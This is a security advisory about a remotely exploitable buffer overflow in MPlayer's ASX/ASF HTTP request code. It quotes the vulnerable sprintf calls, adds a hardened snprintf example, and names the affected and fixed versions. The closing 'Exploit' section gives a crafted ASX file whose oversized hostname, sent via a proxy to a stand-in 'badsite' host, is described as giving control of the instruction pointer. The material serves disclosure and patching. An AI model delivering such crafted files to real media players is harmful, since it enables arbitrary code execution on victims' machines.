Summary:
A remotely exploitable buffer overflow vulnerability was found in MPlayer. A malicious host can craft a harmful ASX header and trick MPlayer into executing arbitrary code upon parsing that header.
Credit:
The information has been provided by Otero, Hernan.
Vulnerable systems:
* MPlayer 0.90pre series
* MPlayer 0.90rc series
* MPlayer 0.90
* MPlayer 0.91
* MPlayer 1.0pre1
Immune systems:
* MPlayer releases before 0.90pre1
* MPlayer 0.92
* MPlayer HEAD CVS
In the source tree there is a file called asf_streaming.c. This file has a function named asf_http_request, and that function contains two buffer overflows, both in its sprintf lines:
asf_http_request {
    char str[250];   /* fixed-size local buffer, no bounds check below */
    ...
    /* hostname and port come from the URL the ASX file points at */
    sprintf( str, "Host: %s:%d", server_url->hostname, server_url->port );
    ...
    sprintf( str, "Host: %s:%d", url->hostname, url->port );
    ...
}
At first glance this may look unexploitable, because of the MAXHOSTLEN size restriction. However, with an ASX file like the one below, and a "badsite" listening on "badport" that sends "\n\n" as its answer, it leads to a fully controllable EIP buffer overflow.
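The following is an added example and not MPlayer's code: it shows the hardened form of the two sprintf() calls, a bounded snprintf() with an explicit length check, next to a helper that reports whether the original unbounded write would have overflowed the 250-byte buffer for a given hostname. The buffer size and format string are taken from the snippet above; the function names and the sample hostname are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

#define STR_LEN 250   /* size of the local buffer in asf_http_request() */

/* Bytes that "Host: %s:%d" expands to (without the NUL). Anything at or
 * above STR_LEN means the original unbounded sprintf() writes past str. */
size_t host_header_len(const char *hostname, int port) {
    return (size_t)snprintf(NULL, 0, "Host: %s:%d", hostname, port);
}

/* 1 if the unbounded sprintf() would overflow a STR_LEN-byte buffer. */
int would_overflow(const char *hostname, int port) {
    return host_header_len(hostname, port) >= STR_LEN;
}

/* Hardened replacement for the two sprintf() calls: the write is bounded by
 * str_len, and a header that does not fit is rejected instead of truncated.
 * Returns the header length, or -1 when it would not fit. */
int build_host_header(char *str, size_t str_len, const char *hostname, int port) {
    int n = snprintf(str, str_len, "Host: %s:%d", hostname, port);
    if (n < 0 || (size_t)n >= str_len) {
        str[0] = '\0';          /* do not leave a half-written header behind */
        return -1;
    }
    return n;
}

/* Same call using a STR_LEN local buffer, as asf_http_request() does. */
int try_host_header(const char *hostname, int port) {
    char str[STR_LEN];
    return build_host_header(str, sizeof str, hostname, port);
}

/* Constructed sample: a 299-character hostname like the "aaa..." one in the ASX. */
const char *constructed_long_host(void) {
    static char host[300];
    memset(host, 'a', sizeof host - 1);
    host[sizeof host - 1] = '\0';
    return host;
}

int main(void) {
    const char *h = constructed_long_host();
    printf("short hostname -> %d\n", try_host_header("badsite", 8080));
    printf("long hostname  -> %d (unbounded sprintf overflows: %d)\n",
           try_host_header(h, 8080), would_overflow(h, 8080));
    return 0;
}
```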
Patch availability:
A patch is available for all vulnerable versions here.
Exploit:
<asx version = "3.0">
<title>Bad Site ASX</title>
<moreinfo href = "mailto:info@badsite.com" />
<logo href = "http://www.badsite.com/streaming/grupo.gif" style="ICON" />
<banner href= "images/bannermitre.gif">
<abstract>Bad Site live</abstract>
<moreinfo target="_blank" href = "http://www.badsite.com/" /> </banner>
<entry>
<title>NEWS</title>
<AUTHOR>NEWS</AUTHOR>
<COPYRIGHT>(c) All by the news</COPYRIGHT>
<ref href = "http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"/>
<logo href = "http://www.badsite.com/streaming/grupo.gif" style="ICON" />
</entry>
</asx>